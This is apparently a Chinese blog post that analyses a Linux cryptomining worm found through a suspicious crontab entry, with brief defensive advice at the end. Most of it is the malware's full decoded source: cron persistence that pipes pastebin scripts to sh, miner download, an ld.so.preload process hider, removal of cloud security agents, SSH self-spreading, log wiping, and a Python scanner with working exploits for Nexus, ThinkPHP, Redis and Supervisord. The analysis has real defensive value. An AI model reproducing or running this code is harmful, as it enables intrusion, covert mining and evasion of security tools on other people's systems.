2. 软件开发
    3. 病毒样本

    病毒样本

    xiaoxiao2025-03-05  32

    crontab可疑行

    # crontab脚本,删掉后会自动重写 */23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh 查看其中的qbbSdzZd文件 > wget https://pastebin.com/raw/qbbSdzZd && cat qbbSdzZd # 得到 (curl -fsSL https://pastebin.com/raw/T8zYizW2 || wget -q -O- https://pastebin.com/raw/T8zYizW2)|base64 -d |/bin/bash # 得到病毒的代码,这里的病毒代码可能会改变 > wget https://pastebin.com/raw/T8zYizW2 | base64 -d #!/bin/bash SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin function b() { pkill wnTKYg && pkill ddg* && rm -rf /tmp/ddg* && rm -rf /tmp/wnTKYg rm -rf /tmp/qW3xT.2 /tmp/ddgs.3020 /tmp/ddgs.3020 /tmp/wnTKYg /tmp/2t3ik ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "xig" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "ddgs" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "qW3xT" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "t00ls.ru" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "sustes" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "cranbery" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "wnTKYg" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep "thisxxs" | awk '{print $2}' | xargs kill -9 ps auxf|grep -v grep|grep "hashfish" | awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep /opt/yilu/mservice|awk '{print $2}'|xargs kill -9 ps auxf|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 ps auxf | grep -v grep | grep hwlh3wlh44lh | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9 p=$(ps auxf|grep -v grep|grep sysinfo|wc -l) if [ ${p} -eq 0 ];then ps auxf|grep -v grep | awk '{if($3>=80.0) print $2}'| xargs kill -9 fi } function d() { ARCH=$(uname -i) if [ "$ARCH" == "x86_64" ]; then mkdir -p /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy chmod 1777 /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy (curl -fsSL --connect-timeout 120 http://alonecode.ml/linux/sysinfo -o /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo \ || wget http://alonecode.ml/linux/sysinfo -O /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo) \ && chmod +x /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo nohup /tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo >/dev/null 2>1 & else mkdir -p /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy chmod 1777 /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy (curl -fsSL --connect-timeout 120 http://alonecode.ml/linux/sysinfo -o /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo \ || wget http://alonecode.ml/linux/sysinfo -O /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo) \ && chmod +x /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo nohup /var/tmp/systemd-private-2270f1520zse4c8a94a91c107d5b9d1b-cups.service-sjwnOy/sysinfo >/dev/null 2>1 & fi } function e() { nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hUV3B5MmcxJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 & touch /tmp/.38t9guft0055d0565u444gtjr0 } function c() { chattr -i /usr/local/bin/dns /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload (curl -fsSL --connect-timeout 120 https://pastebin.com/raw/cBjiacdv -o /usr/local/bin/dns \ || wget https://pastebin.com/raw/cBjiacdv -O /usr/local/bin/dns) \ && chmod 755 /usr/local/bin/dns \ && touch -acmr /bin/sh /usr/local/bin/dns && chattr +i /usr/local/bin/dns echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /usr/local/bin/dns" > /etc/crontab && touch -acmr /bin/sh /etc/crontab echo -e "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /etc/cron.d/root && touch -acmr /bin/sh /etc/cron.d/root && chattr +i /etc/cron.d/root echo -e "*/17 * * * * root (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /etc/cron.d/apache && touch -acmr /bin/sh /etc/cron.d/apache && chattr +i /etc/cron.d/apache echo -e "*/23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /var/spool/cron/root && touch -acmr /bin/sh /var/spool/cron/root && chattr +i /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo -e "*/31 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh\n##" > /var/spool/cron/crontabs/root && touch -acmr /bin/sh /var/spool/cron/crontabs/root && chattr +i /var/spool/cron/crontabs/root mkdir -p /etc/cron.hourly (curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.hourly/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.hourly/oanacroner) && chmod 755 /etc/cron.hourly/oanacroner mkdir -p /etc/cron.daily (curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.daily/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.daily/oanacroner) && chmod 755 /etc/cron.daily/oanacroner mkdir -p /etc/cron.monthly (curl -fsSL --connect-timeout 120 https://pastebin.com/raw/qbbSdzZd -o /etc/cron.monthly/oanacroner||wget https://pastebin.com/raw/qbbSdzZd -O /etc/cron.monthly/oanacroner) && chmod 755 /etc/cron.monthly/oanacroner mkdir -p /usr/local/lib/ if [ ! -f "/usr/local/lib/libdns.so" ]; then curl -fsSL --connect-timeout 120 http://alonecode.ml/libprocesshider.so -o /usr/local/lib/libdns.so && chmod 755 /usr/local/lib/libdns.so && touch -acmr /bin/sh /usr/local/lib/libdns.so && chattr +i /usr/local/lib/libdns.so if [ ! -f "/usr/local/lib/libdns.so" ]; then wget http://alonecode.ml/libprocesshider.so -O /usr/local/lib/libdns.so \ && chmod 755 /usr/local/lib/libdns.so \ && touch -acmr /bin/sh /usr/local/lib/libdns.so \ && chattr +i /usr/local/lib/libdns.so fi fi echo /usr/local/lib/libdns.so > /etc/ld.so.preload touch -acmr /bin/sh /etc/ld.so.preload touch -acmr /bin/sh /usr/local/lib/libdns.so chattr -i /etc/ld.so.preload && echo /usr/local/lib/libdns.so > /etc/ld.so.preload && touch -acmr /bin/sh /etc/ld.so.preload if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then # 两个分号的地方应该只有一个,多的一个是我加的,为了语法高亮。这里是到know_hosts的机器里面找免密登陆的机器,下载并运行病毒 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h \ '(curl -fsSL https://pastebin.com/raw/qbbSdzZd || wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh' & done fi touch -acmr /bin/sh /etc/cron.hourly/oanacroner touch -acmr /bin/sh /etc/cron.daily/oanacroner touch -acmr /bin/sh /etc/cron.monthly/oanacroner } function a() { #卸载安全程序 if ps aux | grep -i '[a]liyun'; then wget http://update.aegis.aliyun.com/download/uninstall.sh chmod +x uninstall.sh ./uninstall.sh wget http://update.aegis.aliyun.com/download/quartz_uninstall.sh chmod +x quartz_uninstall.sh ./quartz_uninstall.sh rm -f uninstall.sh quartz_uninstall.sh pkill aliyun-service rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service rm -rf /usr/local/aegis*; elif ps aux | grep -i '[y]unjing'; then /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh fi touch /tmp/.a } mkdir -p /tmp chmod 1777 /tmp if [ ! -f "/tmp/.a" ]; then a fi b c port=$(netstat -an | grep :3333 | wc -l) if [ ${port} -eq 0 ];then d fi if [ ! -f "/tmp/.38t9guft0055d0565u444gtjr0" ]; then e fi echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron # #%

    将上述代码的e函数拿出来

    python -c import base64; exec( base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hUV3B5MmcxJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz') )

    解码

    #coding: utf-8 import urllib import base64 d= 'https://pastebin.com/raw/xTWpy2g1' try: page=base64.b64decode(urllib.urlopen(d).read()) exec(page) except: pass

    再解码

    # -*- coding: utf-8 -*- import requests import threading import time import socket from xmlrpclib import ServerProxy from re import findall import os import json import sys reload(sys) sys.setdefaultencoding('utf-8') # import redis from bs4 import BeautifulSoup Number = 0 ThreadNumberGo = 0 Victor = 0 a3 = 0 a4 = 0 A = 0 NexusLDNumber = 0 NexusVNumber = 0 ThinkphpLDNumber = 0 ThinkphpVNumber = 0 RedisLDNumber = 0 RedisVNumber = 0 SupervisordLDNumber = 0 SupervisordVNumber = 0 class Thread (threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): global a3 IP_list(a3) def IP_list(a3): global ThreadNumberGo global ip ThreadNumberGo += 1 ip2 = os.popen("/sbin/ifconfig -a|grep inet|grep -v 127.0.0.1|grep -v inet6|awk '{print $2}'|tr -d \"addr:\"").readline().rstrip() ips2 = findall(r'\d+.\d+.', ip2)[0] for i in range(0, 255): ip_list2 = (ips2 + (str(i))) for g in range(1, 255): ip = ip_list2 + '.' + (str(g)) try: Nexus(ip) except: try: Thinkphp(ip) except: try: Redis(ip) except: try: Supervisord(ip,"9000") except: try: Supervisord(ip,"9001") except: try: Supervisord(ip,"9002") except: try: Supervisord(ip,"9003") except: try: Supervisord(ip,"8090") except: try: Supervisord(ip,"7001") except: try: Supervisord(ip,"9999") except: try: Supervisord(ip,"80") except: try: Supervisord(ip,"9100") except: pass ThreadNumberGo -= 1 def Nexus(IP): url = "http://{0}:8081/".format(IP) html = requests.get(url,timeout=5) html = html.text if html.find("Nexus Repository Manager") > 0: if html.find("/static/rapture/resources/favicon.ico?_v=") > 0: if int(html[html.find("/static/rapture/resources/favicon.ico?_v=") + len("/static/rapture/resources/favicon.ico?_v=3."):html.find(".",html.find("/static/rapture/resources/favicon.ico?_v=") + len("/static/rapture/resources/favicon.ico?_v=3."))]) < 15: def Attack(ip,port,Command): AccUrl = "http://{0}:{1}".format(ip,port) + "/service/extdirect" data = {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter": [{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName('java.lang.Runtime').getRuntime().exec('{0}')".format(Command)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8} headers = { "Host":"{0}:{1}".format(ip,port), "User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101", "Accept":"*/*", "Content-Type":"application/json", "X-Requested-With":"XMLHttpRequest", "Content-Length":"368", "Connection":"close" } requests.post(AccUrl,data=json.dumps(data),headers=headers,timeout=10) Attack(IP,"8081","curl -fsSL https://pastebin.com/raw/b5p2r6DQ -o /tmp/sh-thd-1555254163650") time.sleep(5) Attack(IP,"8081","chmod +x /tmp/sh-thd-1555254163650") time.sleep(3) Attack(IP,"8081","/bin/bash /tmp/sh-thd-1555254163650") def Thinkphp(IP): global ip try: url = "http://{0}".format(IP) response = requests.get(url=url + r"/public/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5) except: try: url = "http://{0}".format(IP) response = requests.get(url=url + r"/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5) except: try: url = "https://{0}".format(IP) response = requests.get(url=url + r"/public/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5) except: url = "https://{0}".format(IP) response = requests.get(url=url + r"/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1",timeout=5) soup = BeautifulSoup(response.text,"lxml") if 'PHP Version' in str(soup.text): def Attack(Url,Command): url = Url try: requests.get(url=url + r"/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={0}".format(Command),timeout=5) except: try: requests.get(url=url + r"/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]={0}".format(Command),timeout=5) except: pass try: Attack(url,"(curl -fsSL https://pastebin.com/raw/b5p2r6DQ||wget -q -O- https://pastebin.com/raw/b5p2r6DQ)|bash") except: pass class Redis(): def __init__(self,host): self.host = host def run(self): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) s.connect((self.host, 6379)) s.send("info\r\n") if s.recv(1) == '$': s.send('config set dir /var/spool/cron\r\n') time.sleep(1) s.send('config set dbfilename root\r\n') time.sleep(1) s.send('set ACbackup "\\n\\n\\n*/1 * * * * curl -fsSL https://pastebin.com/raw/b5p2r6DQ|bash\\n\\n\\n"\r\n') time.sleep(1) s.send('save\r\n') s.close() def Supervisord(IP,Port): def AttackPOC(IP,Port): target = "http://{0}:{1}/RPC2".format(IP,Port) socket.setdefaulttimeout(25) try: server = ServerProxy(target) server.supervisor.supervisord.options.warnings.linecache.os.system('curl -fsSL https://pastebin.com/raw/b5p2r6DQ -o /tmp/sh-thd-1555254163650') time.sleep(1) server.supervisor.supervisord.options.warnings.linecache.os.system('wget https://pastebin.com/raw/b5p2r6DQ -O /tmp/sh-thd-1555254163650') time.sleep(1) server.supervisor.supervisord.options.warnings.linecache.os.system('chmod +x /tmp/sh-thd-1555254163650') time.sleep(1) server.supervisor.supervisord.options.warnings.linecache.os.system('/bin/bash /tmp/sh-thd-1555254163650') except: pass AttackPOC(IP,Port) thread = locals() ThreadNumber = os.popen("grep 'processor' /proc/cpuinfo | sort -u | wc -l") ThreadNumber = ThreadNumber.read() K = 0 LThreadNumber = 0 while LThreadNumber < 255: if a3 < 255: if ThreadNumberGo < int(ThreadNumber): LThreadNumber += 1 for ZS in range(LThreadNumber,LThreadNumber+1): thread[str(K)] = Thread() (thread[str(K)]).start() a3 += 1 K += 1 else: if open("/tmp/.38t9guft0055d0565u444gtjr0"): os.remove("/tmp/.38t9guft0055d0565u444gtjr0") break

    思考

    可以看出来病毒的代码非常的丑陋,但是也非常暴力和高效可能出现漏洞的软件:Nenux, Thinkphp, redis, supervisord。所以要检查这些软件是不是没有设置密码什么的如果已经感染病毒,查看局域网的其他机器是否都免密了,是否也感染了病毒可以从病毒上面学习一些知识
    最新回复(0)